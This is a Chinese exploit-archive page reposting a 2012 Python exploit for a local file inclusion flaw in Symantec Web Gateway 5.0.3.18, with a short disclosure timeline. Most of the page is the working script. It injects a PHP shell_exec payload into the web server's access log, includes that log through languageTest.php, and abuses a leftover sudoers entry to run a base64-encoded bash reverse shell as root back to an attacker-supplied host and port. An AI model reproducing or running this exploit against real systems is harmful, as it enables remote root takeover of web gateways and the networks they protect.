首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit
来源:http://www.offensive-security.com 作者:muts 发布时间:2012-07-24  

#!/usr/bin/python

'''

The original patch for the Symantec Web Gateway 5.0.2 LFI vulnerability removed the
/tmp/networkScript file but left the entry in /etc/sudoers, allowing us to simply
recreate the file and obtain a root shell using a different LFI vulnerability.

Timeline:

# 06 Jun 2012: Vulnerability reported to CERT
# 08 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 26 Jun 2012: Email received from Symantec for additional information
# 26 Jun 2012: Additional proofs of concept sent to Symantec
# 06 Jul 2012: Update received from Symantec with intent to fix
# 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
# 23 Jul 2012: Public Disclosure

'''

import socket
import sys
import base64

print "[*] #########################################################"
print "[*] Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit"
print "[*] Offensive Security - http://www.offensive-security.com"
print "[*] #########################################################\n"

if (len(sys.argv) != 4):
 print "[*] Usage: symantec-web-gateway-0day.py <RHOST> <LHOST> <LPORT>"
 exit(0)

rhost = str(sys.argv[1])
lhost = sys.argv[2]
lport = sys.argv[3]

# Base64 encoded bash reverse shell
# Payload does sudo-fu abuse of sudoable /tmp/networkScript with apache:apache permissions

payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/'''+lhost+'/' + lport
payload+=''' 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript'''
payloadencoded=base64.encodestring(payload).replace("\n","")

taint="GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded
trigger="GET /spywall/languageTest.php?&language=../../../../../../../../usr/local/apache2/logs/access_log%00 HTTP/1.0\r\n\r\n"

print "[*] Super Sudo Backdoor injection, w00t"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((rhost, 80))
expl.send(taint)
expl.close()

print "[*] Triggering Payload ...3,2,1 "
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((rhost, 80))
expl.send(trigger)
expl.close()
print "[*] Can you haz shell on %s %s ?\n" % (lhost,lport)

 
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AlienVault OSSIM 3.1 Reflected
·MyMp3 Player Stack .m3u DEP By
·Zabbix 2.0.1 and Earlier Sessi
·Symantec Web Gateway 5.0.2 (bl
·Symantec Web Gateway 5.0.3.18
·Photodex ProShow Producer v5.0
·Linux x86 execve("/bin/sh") -
·EGallery PHP File Upload Vulne
·Linux x86 chmod 666 /etc/passw
·Simple Web Server Connection H
·Photodex ProShow Producer 5.0.
·Ipswitch WhatsUp Gold 15.02 St
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved